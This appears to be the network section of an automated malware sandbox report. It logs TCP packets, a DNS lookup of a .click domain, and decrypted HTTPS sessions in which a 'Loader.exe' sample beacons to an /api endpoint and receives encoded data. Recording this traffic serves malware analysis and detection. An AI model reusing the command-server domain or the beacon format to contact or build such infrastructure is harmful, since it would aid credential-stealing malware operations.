Dec 31, 2024 17:42:36.333276987 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333493948 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.333507061 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333684921 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.333698034 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.333874941 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.333887100 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334037066 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334050894 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334232092 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334240913 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334441900 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334455967 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334600925 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334615946 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334785938 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334794044 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.334954023 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.334959984 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.335146904 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.335159063 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.335338116 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.335355997 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.335566044 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.335583925 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.335750103 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.335763931 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.335901976 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.335908890 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.336057901 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.336064100 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.336253881 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.336261988 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.336442947 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.336451054 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.336666107 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.336679935 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.336859941 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.337049961 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.337213039 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.337414026 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.337630033 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.338161945 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.338349104 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.338541985 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.338752985 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.338942051 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.339133978 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.339309931 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.339472055 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.339695930 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.382205009 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.382906914 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.382921934 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.383091927 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.383099079 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.383275032 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.383282900 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.383449078 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.383455992 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.383611917 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.383619070 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.383805990 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.383811951 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:36.384098053 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.384289026 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.384481907 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.384594917 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.384764910 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.384957075 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.385251045 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:36.426207066 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.424493074 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.424849987 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.425137997 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.425271988 CET	49761	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.425323009 CET	443	49761	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.466042042 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.466125011 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.466264963 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.466489077 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.466527939 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.735467911 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.735774994 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.736583948 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.736593962 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.736828089 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:40.737884998 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.737884998 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:40.737938881 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414177895 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414453983 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414583921 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414644957 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.414676905 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414695978 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414860964 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.414961100 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.415030003 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415030003 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415047884 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.415071011 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.415220976 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415261030 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.415549994 CET	443	49762	172.67.157.249	192.168.11.20
Dec 31, 2024 17:42:41.415581942 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415800095 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415800095 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.415800095 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.714801073 CET	49762	443	192.168.11.20	172.67.157.249
Dec 31, 2024 17:42:41.714812994 CET	443	49762	172.67.157.249	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 17:42:27.392051935 CET	52464	53	192.168.11.20	1.1.1.1
Dec 31, 2024 17:42:27.528168917 CET	53	52464	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 31, 2024 17:42:27.392051935 CET	192.168.11.20	1.1.1.1	0xfa0a	Standard query (0)	stingyerasjhru.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 31, 2024 17:42:27.528168917 CET	1.1.1.1	192.168.11.20	0xfa0a	No error (0)	stingyerasjhru.click		172.67.157.249	A (IP address)	IN (0x0001)	false
Dec 31, 2024 17:42:27.528168917 CET	1.1.1.1	192.168.11.20	0xfa0a	No error (0)	stingyerasjhru.click		104.21.58.80	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

stingyerasjhru.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49755	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:27 UTC	267	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stingyerasjhru.click
2024-12-31 16:42:27 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-12-31 16:42:28 UTC	1135	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:28 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=u2f9uee89qke9t8oa3esj3a9u1; expires=Sat, 26 Apr 2025 10:29:07 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVX8rc3ePG51eFC5NEDxF92jfgNzg43CzSrDvkPBQ26HZiumNx0keblUy4NEGjSM%2BFDoxeGIrE8ohbnoroIJQJvuT8pxg0vX%2BYGgePSx908n3AGxZ0wCVKYkWiV5pkSTEXgiQEJHmw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb9153e65744a-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=128878&min_rtt=128776&rtt_var=27331&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2853&recv_bytes=911&delivery_rate=29655&cwnd=241&unsent_bytes=0&cid=b761e8ffd5c24818&ts=686&x=0"
2024-12-31 16:42:28 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2024-12-31 16:42:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49756	172.67.157.249	443	1980	C:\Users\user\Desktop\Loader.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-31 16:42:28 UTC	268	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 50 Host: stingyerasjhru.click
2024-12-31 16:42:28 UTC	50	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 70 71 5a 6e 4b 50 2d 2d 5a 32 78 73 5a 58 68 6c 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=pqZnKP--Z2xsZXhl&j=
2024-12-31 16:42:29 UTC	1141	IN	HTTP/1.1 200 OK Date: Tue, 31 Dec 2024 16:42:29 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ojbh1nud2vrpropo3e3s8guul2; expires=Sat, 26 Apr 2025 10:29:08 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0KZrbIO9dwgg8P3tRWV52CPdDI6DejHjw77OtADcUl9qRFsIE2%2FVOvYdzqWMZDu5G6SMaxKlphAM0E%2Fibp7%2Byz2XDN2239i0iIFB3U9ZU7kfQqweSrQgwCmz7Ps%2BZkNtEBs9Zo%2B56A%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb91b288031e9-MIA alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=129260&min_rtt=129132&rtt_var=27444&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2853&recv_bytes=954&delivery_rate=29553&cwnd=241&unsent_bytes=0&cid=4397af3cf13175bb&ts=730&x=0"
2024-12-31 16:42:29 UTC	228	IN	Data Raw: 34 39 39 34 0d 0a 74 37 2b 70 2b 77 49 67 6e 48 76 6b 6e 43 59 5a 68 68 74 4e 66 75 4a 6e 48 61 42 35 73 6d 58 6e 61 74 5a 76 4a 73 58 6f 7a 56 6e 4d 6e 64 2f 5a 4f 42 53 77 57 5a 66 35 42 43 50 79 61 54 67 62 7a 6b 56 38 78 46 75 49 41 34 59 47 70 51 6f 4b 35 35 36 67 65 34 33 5a 79 4a 64 78 52 62 42 5a 67 65 51 45 49 39 31 67 62 78 75 4d 52 53 65 43 48 4e 67 48 68 67 61 30 44 6b 32 71 6d 4b 45 36 33 39 50 4f 6b 32 64 44 2b 42 71 49 38 55 4e 38 34 33 6f 6e 45 49 73 4b 64 63 31 62 6e 6b 65 43 45 50 52 56 42 49 69 4e 75 54 6a 36 33 74 71 51 49 46 32 77 41 4d 62 35 53 44 75 38 4f 53 77 62 67 41 74 37 78 42 4c 61 44 59 38 4f 74 51 74 4d 74 59 47 72 4d 64 2f 64 7a 5a 4a 74 53 75 Data Ascii: 4994t7+p+wIgnHvknCYZhhtNfuJnHaB5smXnatZvJsXozVnMnd/ZOBSwWZf5BCPyaTgbzkV8xFuIA4YGpQoK556ge43ZyJdxRbBZgeQEI91gbxuMRSeCHNgHhga0Dk2qmKE639POk2dD+BqI8UN843onEIsKdc1bnkeCEPRVBIiNuTj63tqQIF2wAMb5SDu8OSwbgAt7xBLaDY8OtQtMtYGrMd/dzZJtSu
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 77 58 67 76 5a 49 65 75 6c 36 62 31 4c 41 41 6d 65 43 51 35 42 55 74 77 75 6c 48 46 47 71 6d 71 6c 37 79 70 50 53 32 57 64 4f 76 6b 48 47 39 6b 68 31 34 58 6f 67 47 34 45 46 62 63 30 62 30 77 2b 4e 44 4c 34 43 53 36 69 45 70 54 7a 64 31 4d 79 57 5a 30 72 34 46 6f 57 2b 43 6a 76 6a 59 57 39 45 77 43 56 76 77 52 6a 45 43 70 52 49 71 30 4e 64 35 34 32 6a 65 34 32 64 7a 5a 64 68 54 2f 34 4c 6a 76 56 50 66 76 5a 79 4a 68 47 4e 42 58 4c 49 46 4e 4d 48 67 67 4b 2b 41 6b 36 6a 68 36 49 39 31 64 32 4c 31 79 42 46 35 6c 6e 65 76 6d 64 2b 39 48 34 6a 43 73 49 2f 50 39 31 56 79 55 65 43 42 50 52 56 42 4b 2b 50 72 44 6a 65 30 73 69 52 61 31 44 2b 43 34 44 7a 51 57 6e 69 66 43 45 57 67 78 64 31 7a 42 33 54 44 6f 34 42 73 51 70 41 35 38 54 76 50 4d 32 64 6b 39 6c 42 54 Data Ascii: wXgvZIeul6b1LAAmeCQ5BUtwulHFGqmql7ypPS2WdOvkHG9kh14XogG4EFbc0b0w+NDL4CS6iEpTzd1MyWZ0r4FoW+CjvjYW9EwCVvwRjECpRIq0Nd542je42dzZdhT/4LjvVPfvZyJhGNBXLIFNMHggK+Ak6jh6I91d2L1yBF5lnevmd+9H4jCsI/P91VyUeCBPRVBK+PrDje0siRa1D+C4DzQWnifCEWgxd1zB3TDo4BsQpA58TvPM2dk9lBT
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 39 51 48 72 75 61 7a 30 63 6a 42 64 7a 79 42 33 66 43 6f 6c 49 2b 6b 31 44 76 38 72 33 65 2f 2f 65 33 35 70 71 41 4d 73 61 69 50 42 44 62 61 52 6d 59 51 58 41 41 6e 4f 43 51 35 41 4b 68 41 43 79 48 30 75 71 69 61 45 31 32 74 6a 45 6b 57 42 43 38 78 79 43 39 55 39 34 36 58 30 39 46 6f 41 4e 65 73 4d 52 32 6b 66 4c 53 4c 4d 56 42 50 2f 4b 6e 69 7a 65 6e 2f 36 61 62 6b 7a 35 44 38 62 68 43 6d 4b 6b 66 69 4e 63 32 45 56 79 79 68 37 56 43 49 51 43 75 67 68 4f 71 34 4b 68 4f 4d 66 53 7a 35 6c 73 53 76 51 55 69 50 70 4d 63 75 39 79 4b 52 79 42 44 7a 2b 4d 57 39 63 66 78 56 44 30 4f 55 4f 72 68 36 42 35 34 4e 37 46 6c 32 64 55 76 67 62 49 35 77 52 38 36 44 6c 33 58 49 77 4d 66 38 6b 52 31 41 65 43 42 62 45 4f 51 36 53 48 71 44 48 62 32 73 2b 56 61 55 2f 34 47 59 Data Ascii: 9QHruaz0cjBdzyB3fColI+k1Dv8r3e//e35pqAMsaiPBDbaRmYQXAAnOCQ5AKhACyH0uqiaE12tjEkWBC8xyC9U946X09FoANesMR2kfLSLMVBP/Knizen/6abkz5D8bhCmKkfiNc2EVyyh7VCIQCughOq4KhOMfSz5lsSvQUiPpMcu9yKRyBDz+MW9cfxVD0OUOrh6B54N7Fl2dUvgbI5wR86Dl3XIwMf8kR1AeCBbEOQ6SHqDHb2s+VaU/4GY
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 2f 44 6c 33 58 49 73 77 63 64 52 62 7a 30 6d 63 53 4c 4d 42 42 50 2f 4b 70 6a 4c 48 30 38 57 51 62 55 54 32 48 6f 6a 7a 54 33 33 76 66 69 67 61 6a 51 31 79 78 78 6a 52 41 34 38 61 74 77 5a 4f 71 6f 44 76 64 5a 58 61 30 39 6b 34 41 74 6b 56 72 2b 35 66 61 66 49 35 4d 46 4b 5a 52 58 6a 4f 57 34 68 48 68 67 65 39 41 6b 79 76 68 61 41 2f 32 39 76 4e 6c 47 56 4e 39 41 75 4f 38 45 6c 77 36 33 49 39 48 49 30 42 63 38 59 54 32 77 33 46 52 76 51 4b 58 4f 66 53 37 77 37 59 30 73 75 61 64 67 4c 68 56 35 2b 2b 51 33 65 6b 49 57 38 51 6a 67 56 77 7a 68 66 62 44 34 51 45 75 67 70 42 72 6f 4b 6e 4b 64 54 5a 77 35 68 75 54 66 38 64 67 2f 74 41 66 4f 42 2f 49 46 7a 4f 52 58 6a 61 57 34 68 48 71 69 2b 42 54 32 57 64 79 72 42 31 7a 4a 33 4d 6c 53 41 61 76 68 57 46 38 6b 78 Data Ascii: /Dl3XIswcdRbz0mcSLMBBP/KpjLH08WQbUT2HojzT33vfigajQ1yxxjRA48atwZOqoDvdZXa09k4AtkVr+5fafI5MFKZRXjOW4hHhge9AkyvhaA/29vNlGVN9AuO8Elw63I9HI0Bc8YT2w3FRvQKXOfS7w7Y0suadgLhV5++Q3ekIW8QjgVwzhfbD4QEugpBroKnKdTZw5huTf8dg/tAfOB/IFzORXjaW4hHqi+BT2WdyrB1zJ3MlSAavhWF8kx
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 42 44 41 58 54 2f 49 45 4e 51 45 67 51 32 37 44 45 57 68 6d 4b 67 79 78 39 50 47 6c 6d 68 4b 39 78 69 43 2b 30 6c 39 36 48 4d 75 47 34 34 4c 64 34 4a 56 6b 41 43 64 53 4f 78 4e 5a 62 65 52 76 53 33 59 2f 4d 61 57 49 46 32 77 41 4d 62 35 53 44 75 38 4f 53 59 4f 68 41 68 74 79 78 7a 65 43 49 59 61 74 51 42 50 74 59 32 67 50 39 4c 52 7a 5a 5a 6d 51 2f 73 54 69 76 6c 42 63 4f 74 31 62 31 4c 41 41 6d 65 43 51 35 41 70 6a 68 75 6a 44 6b 71 73 6e 4c 52 37 79 70 50 53 32 57 64 4f 76 6b 48 47 2f 55 39 77 34 48 6b 6a 48 49 51 49 66 39 41 55 31 77 43 4d 41 36 59 48 51 36 43 42 70 7a 44 61 32 39 6d 56 62 6c 44 37 43 35 53 2b 43 6a 76 6a 59 57 39 45 77 44 4e 34 30 67 76 54 52 62 51 65 74 78 74 50 71 6f 62 76 4a 4a 76 45 69 35 35 73 41 71 5a 5a 67 50 46 4e 65 4f 74 34 Data Ascii: BDAXT/IENQEgQ27DEWhmKgyx9PGlmhK9xiC+0l96HMuG44Ld4JVkACdSOxNZbeRvS3Y/MaWIF2wAMb5SDu8OSYOhAhtyxzeCIYatQBPtY2gP9LRzZZmQ/sTivlBcOt1b1LAAmeCQ5ApjhujDkqsnLR7ypPS2WdOvkHG/U9w4HkjHIQIf9AU1wCMA6YHQ6CBpzDa29mVblD7C5S+CjvjYW9EwDN40gvTRbQetxtPqobvJJvEi55sAqZZgPFNeOt4
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 4a 6e 67 6b 4f 51 50 34 34 47 68 67 35 66 35 35 58 68 49 70 58 61 78 39 6b 34 41 76 30 65 68 66 39 4f 63 75 68 32 4b 42 69 53 44 33 6a 51 47 74 45 4d 69 41 53 30 41 45 6d 74 69 36 59 32 32 64 44 4d 6e 6d 39 48 76 6c 66 47 2b 56 77 37 76 44 6b 4f 45 59 73 4a 4a 4a 68 62 7a 30 6d 63 53 4c 4d 42 42 50 2f 4b 72 7a 48 51 31 38 61 61 62 30 48 73 47 49 44 73 52 48 62 75 61 79 55 58 68 51 68 79 7a 78 6a 57 41 59 34 45 70 67 52 45 70 49 48 76 64 5a 58 61 30 39 6b 34 41 74 30 4f 6b 50 52 44 64 2f 4a 79 4c 68 2b 57 43 47 2b 43 56 5a 41 57 67 68 6e 30 56 56 4b 33 6e 61 67 6b 6d 38 53 4c 6e 6d 77 43 70 6c 6d 41 39 30 4a 38 34 6e 63 39 47 59 59 4b 63 4d 73 53 31 41 2b 47 43 4c 41 4a 51 36 4b 4a 6f 7a 44 53 33 73 53 64 61 55 7a 33 46 73 61 77 42 48 7a 38 4f 58 64 63 6f Data Ascii: JngkOQP44Ghg5f55XhIpXax9k4Av0ehf9Ocuh2KBiSD3jQGtEMiAS0AEmti6Y22dDMnm9HvlfG+Vw7vDkOEYsJJJhbz0mcSLMBBP/KrzHQ18aab0HsGIDsRHbuayUXhQhyzxjWAY4EpgREpIHvdZXa09k4At0OkPRDd/JyLh+WCG+CVZAWghn0VVK3nagkm8SLnmwCplmA90J84nc9GYYKcMsS1A+GCLAJQ6KJozDS3sSdaUz3FsawBHz8OXdco
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 56 33 51 61 58 43 37 31 4e 43 75 65 4e 74 33 75 4e 6e 65 75 53 64 6b 66 35 44 38 54 4c 52 33 58 71 66 6a 6c 63 6e 7a 6f 78 67 68 54 4b 52 39 30 78 72 55 31 44 71 38 72 33 65 38 44 61 79 35 35 36 56 50 6b 56 6c 2f 56 4a 64 38 5a 32 4b 41 71 44 43 6e 7a 54 45 70 77 4d 69 45 6a 36 54 55 4f 2f 79 76 64 37 2b 74 72 64 6d 6b 39 42 37 78 44 47 73 41 52 38 38 6a 6c 33 58 4c 35 46 62 63 45 4c 30 77 69 55 4e 76 52 56 58 5a 6e 4b 70 43 33 53 7a 63 69 50 61 30 2f 79 43 4c 69 2b 48 43 2b 32 4b 33 31 4f 30 68 6f 2f 33 53 53 65 52 34 52 49 37 44 52 64 35 35 7a 76 59 34 65 54 69 34 73 67 47 72 35 65 68 65 78 57 66 65 64 76 4c 46 75 2b 4f 31 6a 55 45 64 63 58 67 68 2b 37 54 51 72 6e 68 65 39 6a 37 4a 33 43 6e 6e 74 54 36 42 53 57 2b 51 52 45 71 6a 6b 33 58 4e 68 46 53 73 Data Ascii: V3QaXC71NCueNt3uNneuSdkf5D8TLR3XqfjlcnzoxghTKR90xrU1Dq8r3e8Day556VPkVl/VJd8Z2KAqDCnzTEpwMiEj6TUO/yvd7+trdmk9B7xDGsAR88jl3XL5FbcEL0wiUNvRVXZnKpC3SzciPa0/yCLi+HC+2K31O0ho/3SSeR4RI7DRd55zvY4eTi4sgGr5ehexWfedvLFu+O1jUEdcXgh+7TQrnhe9j7J3CnntT6BSW+QREqjk3XNhFSs
2024-12-31 16:42:29 UTC	1369	IN	Data Raw: 6b 77 57 6b 44 6b 47 67 78 71 63 71 32 4e 47 4c 31 79 42 58 39 52 57 41 38 31 45 30 39 57 38 73 43 6f 64 4a 64 39 4d 57 33 45 65 36 52 76 51 56 42 50 2f 4b 6d 6a 6a 62 30 38 79 50 63 51 2f 65 45 6f 72 39 53 48 72 6a 4f 57 46 63 68 6b 55 6e 6b 56 57 51 41 35 52 49 37 46 30 57 2f 4e 2f 38 62 49 57 50 31 4e 64 35 41 75 68 5a 33 71 77 4b 4f 2f 59 35 64 31 7a 48 42 6d 33 51 48 64 4d 52 68 6b 2b 4b 4d 30 57 71 68 65 4d 31 33 74 33 4d 69 58 5a 5a 73 68 47 46 35 46 35 46 32 6c 49 6a 47 6f 63 66 65 4d 51 39 38 45 66 4c 53 4c 74 4e 48 4a 37 4b 35 33 76 71 6b 34 75 42 49 42 71 2b 4c 49 58 77 53 6e 7a 79 61 47 49 30 6f 7a 39 46 67 44 66 58 45 73 63 38 73 78 31 56 72 49 65 6a 65 35 75 64 7a 64 6b 34 45 72 42 5a 67 75 38 45 49 37 51 72 64 45 6e 54 55 69 2b 51 42 4a 34 Data Ascii: kwWkDkGgxqcq2NGL1yBX9RWA81E09W8sCodJd9MW3Ee6RvQVBP/Kmjjb08yPcQ/eEor9SHrjOWFchkUnkVWQA5RI7F0W/N/8bIWP1Nd5AuhZ3qwKO/Y5d1zHBm3QHdMRhk+KM0WqheM13t3MiXZZshGF5F5F2lIjGocfeMQ98EfLSLtNHJ7K53vqk4uBIBq+LIXwSnzyaGI0oz9FgDfXEsc8sx1VrIeje5udzdk4ErBZgu8EI7QrdEnTUi+QBJ4
